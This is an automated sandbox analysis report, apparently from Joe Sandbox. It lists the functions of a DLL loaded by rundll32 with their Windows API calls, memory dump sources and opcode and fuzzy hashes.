                                                                                                                      • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                      • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3574576181-0
                                                                                                                      • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                      • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                      • String ID: Software\
                                                                                                                      • API String ID: 3878845136-964853688
                                                                                                                      • Opcode ID: e4b2c3dc710f06344b799a6377126916f2dd4417048af34eff523a2566a4e52d
                                                                                                                      • Instruction ID: 3e7de1aae869807147311e9c912979647593f3c49cbedc2fe1c34f8f1305fccc
                                                                                                                      • Opcode Fuzzy Hash: e4b2c3dc710f06344b799a6377126916f2dd4417048af34eff523a2566a4e52d
                                                                                                                      • Instruction Fuzzy Hash: 2641BD35900219DBDF11DBA4CC85AEFB7F9EF49300F10052AF551E7290DB74AA84CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 1001AC38
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                      • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                      • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                      • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                      • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2853195852-0
                                                                                                                      • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                      • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3219385341-0
                                                                                                                      • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                      • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                      • GetParent.USER32(?), ref: 1002A22C
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                      • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                      • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$LongParentVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 506644340-0
                                                                                                                      • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                      • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                      • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                      • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                      • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                      • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                        • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                      • String ID: V&'
                                                                                                                      • API String ID: 1067611704-802299783
                                                                                                                      • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                      • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                      • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                        • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2004563703-0
                                                                                                                      • Opcode ID: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction ID: 36031bf0d5d502a9a7c8cde16f4ed6c3aebd0fb21a6c22909054b64381bbc268
                                                                                                                      • Opcode Fuzzy Hash: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction Fuzzy Hash: 35216DB4D04299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00C765
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                      • String ID: software
                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                      • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                      • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                        • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                        • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                        • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                        • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task_impl$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1204490572-0
                                                                                                                      • Opcode ID: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction ID: d8da987412a92661894f53f4219df58ee2caf7a71088449fd518a1fce9205d0f
                                                                                                                      • Opcode Fuzzy Hash: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction Fuzzy Hash: 67214770905189DBEB09DB98C960BAEBB75EF01308F18469DE0526B3C2CB392B10C716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                        • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                        • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 356813703-0
                                                                                                                      • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                      • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Brush
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2798902688-0
                                                                                                                      • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                      • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                        • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                        • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                        • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 63617653-0
                                                                                                                      • Opcode ID: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction ID: 1b2bd9fb6b1df5d5f83e0c816a53a5057bef739e6a7686bc2bbf7ce06708db6b
                                                                                                                      • Opcode Fuzzy Hash: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction Fuzzy Hash: 06F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                        • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                      • _memset.LIBCMT ref: 1002D2F2
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                      Memory Dump Source
